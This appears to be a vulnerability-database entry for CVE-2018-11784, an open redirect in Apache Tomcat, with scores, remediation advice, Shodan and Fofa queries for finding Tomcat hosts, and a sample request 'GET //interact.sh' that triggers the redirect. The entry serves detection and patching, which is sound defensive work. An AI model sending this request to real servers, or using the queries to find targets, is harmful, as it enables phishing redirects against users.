🔙 목록으로 돌아가기

CVE-2018-11784: Apache Tomcat - Open Redirect

TitleApache Tomcat - Open Redirect
Authorgeeknik
SeverityMedium
ImpactAn attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware.
RemediationUpgrade to Apache Tomcat version 9.0.12 or later, or apply the relevant patch provided by the Apache Software Foundation.
CVSS Score4.3
EPSS Score0.85117
CVE IDCVE-2018-11784
CWE IDCWE-601
Shodan Querytitle:"Apache Tomcat"http.title:"apache tomcat"http.html:"apache tomcat"cpe:"cpe:2.3:a:apache:tomcat"
Fofa Querybody="apache tomcat"title="apache tomcat"
Tags cve cve2018 packetstorm tomcat redirect apache vuln

🔍 Vulnerability Description

Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input.

🌐 HTTP Request

GET //interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-11784.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-11784.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A